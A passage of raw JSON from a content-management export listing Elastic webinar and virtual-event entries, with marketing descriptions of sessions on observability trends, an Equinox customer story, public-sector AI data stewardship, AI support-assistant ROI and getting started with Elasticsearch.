3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Elastic Observability: Built for the future with Search AI","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-01-30T19:49:06.236Z","updated_by":"blt3044324473ef223b70bc674c","url":"/virtual-events/introduction-to-elastic-observability","video_type":["blt321a8ac0bef65269"],"vidyard":{"uuid":"","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-01-30T19:49:09.733Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltb3a641fc0754768f","_version":4,"locale":"en-us","ACL":{},"created_at":"2025-01-23T22:33:01.861Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"2025 Observability trends: Maturing beyond the hype and delivering results","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"16474","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":"\u003cp\u003e11:00 a.m. SGT / 1:00 p.m. AEST\u003c/p\u003e\u003cp\u003e11:00 a.m. CEST / 10:00 a.m. GMT / 2:30 p.m. IST\u003c/p\u003e\u003cp\u003e9:00 a.m. PDT / 12:00 p.m. EDT\u003c/p\u003e"},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eDid you know that 65% of IT decision-makers plan on increasing their observability investments in 2025 according to \u003ca href=\"/resources/observability/report/landscape-observability-report\"\u003ea recent survey\u003c/a\u003e?\u003c/p\u003e\u003cp\u003eTake a look at observability today and find out how it's delivering measurable benefits — and what's to come in the future — in this webinar!\u003c/p\u003e\u003cp\u003eSit down for a scintillating conversation around modern observability with experts from Elastic, Microsoft, and Constellation Research. We'll examine how observability maturity is driving real results for organizations and where they are seeing operational efficiencies. We’ll also look at how they are preparing for the future with GenAI and OpenTelemetry.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003eThe importance of observability maturity and how it leads to better operational and business outcomes\u003c/li\u003e\u003cli\u003eThe impact of AI, ML and GenAI on observability teams\u003c/li\u003e\u003cli\u003eChallenges around tool consolidation (hopes versus reality)\u003c/li\u003e\u003cli\u003eOpenTelemetry: expectations and its increasing adoption for observability\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eAdditional resources\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"/explore/devops-observability/modern-observability-guide\"\u003eGuide to modern observability ebook\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"/resources/observability/report/landscape-observability-report\"\u003e2025 Landscape of observability report\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","presentation_date":"2025-02-20T17:00:00.000Z","presenter":["blt9b68ab0f45a5538e","bltde0a0be05534cebf","blte6b5bc992b53dc45"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"Observability trends: Maturing beyond the hype and delivering results","seo_description_l10n":"As modern observability matures, organizations are starting to reap the benefits across a variety of measures. Join us for an exciting discussion with industry experts from Elastic, Microsoft, and Constellation Research. We’ll touch upon key topics like improving customer experience, tool consolidation, GenAI, OpenTelemetry, and more. ","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"2025 Observability trends: Maturing beyond the hype and delivering results","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-01-30T19:08:01.219Z","updated_by":"blt3044324473ef223b70bc674c","url":"/virtual-events/observability-trends-2025","video_type":["blt321a8ac0bef65269"],"vidyard":{"uuid":"","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-01-30T19:08:05.508Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt79a278402fc7971c","_version":9,"locale":"en-us","ACL":{},"created_at":"2024-06-13T16:01:00.521Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":" Equinox levels up its observability fitness with Elastic ","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eFind out how Equinox moved from siloed tools and teams to a modern, observability platform with the help of Elastic Observability! From better resource utilization to improved customer experiences, this transformation led by Joel Miller (Sr. Director of Platform Engineering) has changed the way Equinox Fitness runs their business.\u003c/p\u003e\u003cp\u003eDig into the details on how Equinox unified all of its monitoring and observability data on Elastic to provide a single pane of glass to resolve issues for their engineering teams. This lively discussion will cover challenges they dealt with and how they improved the performance and efficiency of their apps.\u003c/p\u003e\u003cp\u003eAnd while the organization has already seen tremendous benefits, there's even more to come as Equinox continues to level up its observability fitness.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003eA plan to transform the organization with unified observability\u003c/li\u003e\u003cli\u003eFinding noisy services and lowering resource usage\u003c/li\u003e\u003cli\u003eOptimizing app performance for improved customer experiences\u003c/li\u003e\u003cli\u003eThe next steps for Equinox: profiling and generative AI\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eAdditional resources\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003ca href=\"/observability/maturity-assessment\" target=\"_self\"\u003eObservability Maturity Assessment\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"/explore/devops-observability/forrester-total-economic-impact-observability\" target=\"_self\"\u003eThe Forrester Total Economic Impact™ Of Elastic Observability\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"/customers/equinox\" target=\"_self\"\u003eEquinox customer story - Creating business value through unified observability\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","presentation_date":"2024-07-25T16:00:00.000Z","presenter":["bltb5c3fbc91ef7fea6","blt178a1e34b75420cd"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"Equinox Fitness: A transformation to modern observability ","seo_description_l10n":"Find out how Equinox Fitness evolved from siloed tools and teams to a unified observability platform that delivers insights and innovations across the organization. With the deployment of Elastic Observability, Equinox now has full visibility into their application environment and are reaping a myriad of benefits. ","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[{"_version":3,"locale":"en-us","uid":"blta3fd0168b354a680","ACL":{},"created_at":"2023-11-06T21:50:30.740Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elk-elastic-stack","label_l10n":"ELK/Elastic Stack","tags":[],"title":"ELK/Elastic Stack","updated_at":"2024-03-12T21:21:08.589Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-03-12T21:21:14.279Z","user":"blt3044324473ef223b70bc674c"}}],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Equinox levels up its observability fitness with Elastic","token":"4844221834","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-01-30T18:26:43.853Z","updated_by":"blt3044324473ef223b70bc674c","url":"/virtual-events/equinox-levels-up-with-elastic","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"LxkQxzY2KS8qAuPVKuGQSW","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-01-30T18:29:09.472Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt29ddd6158f6f07f5","_version":21,"locale":"en-us","ACL":{},"created_at":"2025-01-03T22:34:33.897Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Public Sector Data Stewardship for the AI Era: A Fireside Chat","paragraph_l10n":"\u003cp\u003e\u003c/p\u003e\n\u003cbr/\u003e\u003cp\u003e\u003c/p\u003e","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eThe public sector is shifting from \"imagining the possibilities\" of generative AI to operationalizing it through their systems and processes to realize its value at scale.\u003c/p\u003e\u003cp\u003eRealizing the value of generative AI at scale depends on having accurate, accessible, trusted data inputs. That's why many public organizations are prioritizing data quality, management, aggregation, and availability, as they look to use AI to advance their programs and missions.\u003c/p\u003e\u003cp\u003eJoin IDC and Elastic for a fireside chat, where AI experts Massimiliano Claps and Dave Erickson will discuss current AI trends in public sector, drawing on both research and real-world use cases from government agencies and other public sector organizations.\u003c/p\u003e\u003cp\u003eThey'll cover topics such as:\u003c/p\u003e\u003cul\u003e\u003cli\u003eDomain-ready data management for AI\u003c/li\u003e\u003cli\u003eTaking a crawl-walk-run approach to AI implementation\u003c/li\u003e\u003cli\u003eHow data quality can support responsible AI use\u003c/li\u003e\u003cli\u003eThe importance of a vector database and cloud native platform\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eAdditional resources\u003c/h4\u003e\u003cul\u003e\u003cli\u003eWebinar: \u003ca href=\"/virtual-events/generative-ai-public-sector\"\u003eThe future of Gen AI for the public sector with IDC analyst Adelaide O'Brien\u003c/a\u003e\u003c/li\u003e\u003cli\u003eBlog: \u003ca href=\"/blog/generative-ai-public-sector\"\u003eThe power of generative AI for government and public sector\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"/contact/publicsector\"\u003eContact an Elasticsearch public sector expert\u003c/a\u003e to talk about how AI can bring value to your agency's mission\u003c/li\u003e\u003c/ul\u003e\u003chr/\u003e\u003cp\u003e\u003cimg src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc6edad9722c1c7d0/677dae2189f49ba14a89555c/logo-idc-500x150.png\" alt=\"logo-idc-500x150.png\" height=\"auto\" width=\"150\" style=\"width: 150;height: auto;\"/\u003e\u003c/p\u003e\u003cbr /\u003e\u003cbr /\u003e\u003cp\u003e\u003cimg width=\"auto\" height=\"auto\" src=\"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt09037366e66bde4e/678ac29de6989875c8281de5/awspublicsectorpartner.light.png\" alt=\"awspublicsectorpartner.light.png\" max-width=\"auto\" style=\"width: auto;height: auto;max-width: auto;\"/\u003e\u003c/p\u003e\u003cul\u003e\u003c/ul\u003e","presentation_date":"2025-01-30T17:00:00.000Z","presenter":["bltbaf54b863bb6af86","blt29236ae1d2f00217"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Public Sector Data Stewardship for the AI Era: A Fireside Chat","token":"Llj56yCO10","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-01-30T18:06:05.180Z","updated_by":"blt417fc94cb7c64d7d","url":"/virtual-events/public-sector-data-stewardship-idc","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"XLqP77SrKDSCC9mm1Lrtxn","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-01-30T18:19:28.531Z","user":"blt417fc94cb7c64d7d","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt473a16a5cbcef8e7","_version":10,"locale":"en-us","ACL":{},"created_at":"2024-11-06T00:22:14.963Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Delivering ROI on AI: How AI transforms customer support efficiency","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eDiscover how a leading technology company built an AI assistant to increase customer and support efficiency and realized a return on investment in less than four months.\u003c/p\u003e\u003cp\u003eExperts from Microsoft, Elastic, and IDC discuss business and technical considerations of optimizing large language models (LLMs) for generative AI applications to deliver business value.\u003c/p\u003e\u003cp\u003eThis discussion will highlight the importance of cost-tracking, AI KPIs, and key business metrics, offering a clear roadmap to returns on your AI investment.\u003c/p\u003e\u003ch4\u003eAdditional resources\u003c/h4\u003e\u003cul\u003e\u003cli\u003eExcited about AI and like to get started? Visit our \u003ca href=\"https://azuremarketplace.microsoft.com/en-us/marketplace/apps/elastic.ec-azure-pp?ocid=microsoft-elastic-support-assistant\"\u003eAzure Marketplace listing.\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"/portfolio/operationalizing-generative-ai-strategic-guide\" target=\"_self\"\u003eAn executive's guide to operationalizing generative AI\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"/pdf/elastic-on-elastic-support-assistant.pdf\" target=\"_self\"\u003eElastic on Elastic: Support Assistant Case Study\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca href=\"/platform\" target=\"_self\"\u003eLearn how to use your data in real time with the Elastic Search AI Platform\u003c/a\u003e\u003c/li\u003e\u003c/ul\u003e","presentation_date":"2025-01-28T21:00:00.000Z","presenter":["blt53f53e1c547f2110","blt57f0334083eb9790","blte0652df2f117e695","blt089f6ddbd5d28a07"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":1,"locale":"en-us","uid":"bltf4c15a435ded5722","ACL":{},"created_at":"2021-04-13T17:54:31.202Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"europe","label_l10n":"Europe","tags":[],"title":"Europe","updated_at":"2021-04-13T17:54:31.202Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-10T12:13:00.412Z","user":"blt3e52848e0cb3c394"}},{"_version":1,"locale":"en-us","uid":"bltdabf9ea82c489dad","ACL":{},"created_at":"2023-06-27T17:09:23.025Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"india","label_l10n":"India","tags":[],"title":"India","updated_at":"2023-06-27T17:09:23.025Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-06-27T17:09:25.693Z","user":"blt36e890d06c5ec32c"}},{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Delivering ROI on AI: How AI transforms customer support efficiency","token":"5346","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-01-28T17:17:42.370Z","updated_by":"blt3044324473ef223b70bc674c","url":"/virtual-events/microsoft-elastic-support-assistant","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"3aVMVBfri3LCHtVZqpN5pa","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-01-29T08:00:00.733Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt5fcfbb6c3ac4c430","_version":54,"locale":"en-us","ACL":{},"created_at":"2019-02-05T07:12:15.912Z","created_by":"sys_blt57a423112de8a853","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"description":"","email_merchandising_placement_number":null},"hour_time_format":false,"image":{"uid":"blta8fb788f1106a523","created_by":"sys_blt57a423112de8a853","updated_by":"sys_blt57a423112de8a853","created_at":"2018-10-11T05:11:15.851Z","updated_at":"2018-10-11T05:11:15.851Z","content_type":"image/jpeg","file_size":"45101","filename":"getting-started-elasticsearch.jpg","title":"getting-started-elasticsearch.jpg","ACL":{},"_version":1,"is_dir":false,"tags":[],"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-03-19T10:37:07.704Z","user":"blt8288fbcbd8c9dce4"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blta8fb788f1106a523/5bbedb737fe6399a7f31fbcf/getting-started-elasticsearch.jpg"},"main_header":{"title_l10n":"Elasticsearch: Getting Started","cta_list":{"cta_title_l10n":"","cta_type":null,"url":""},"paragraph_l10n":"","topic_heading_l10n":""},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":"","cta_title_l10n":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eWhat is Elasticsearch?\u003c/p\u003e\n\u003cp\u003eElasticsearch is a distributed, RESTful search and analytics engine capable of addressing a growing number of use cases. As the heart of the free and open ELK or Elastic Stack, it securely stores your data for lightning fast search, fine‑tuned relevancy, and powerful analytics that scale with ease.\u003c/p\u003e\n\u003cp\u003eThis session is perfect for users that are new to Elasticsearch or users that want to see new capabilities in action. We’ll cover getting started, which includes deploying, managing, and analyzing data in Elasticsearch.\u003c/p\u003e\n\u003ch4\u003eGetting started with Elasticsearch covers:\u003c/h4\u003e\n\u003cul\u003e\n \u003cli\u003eFollowing along the demo by launching a free trial on Elasticsearch Service\u003c/li\u003e\n \u003cli\u003eAdding, updating, and managing data through both CRUD REST APIs and UI\u003c/li\u003e\n \u003cli\u003eConfiguring fields on the fly with basic text analysis including tokenization and filtering\u003c/li\u003e\n \u003cli\u003eBasic search queries\u003c/li\u003e\n \u003cli\u003eAggregations: The faceting and analytics workhorse of Elasticsearch\u003c/li\u003e\n \u003cli\u003eQuerying geo-spatial data\u003c/li\u003e\n \u003cli\u003eFun with analyzers\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eAdditional resources\u003c/h4\u003e\n\u003cul\u003e\n \u003cli\u003eFree trial: \u003ca href=\"https://ela.st/gt-strtd?ultron=\u0026hulk=display\u0026blade=cloud-trial\u0026gambit=\" target=\"_self\"\u003eElastic Cloud\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://info.elastic.co/rs/813-MAM-392/images/Demo_Script.txt\" target=\"_blank\"\u003eDemo_Script.txt\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"https://info.elastic.co/rs/813-MAM-392/images/2019-michelin-restaurants.csv\" 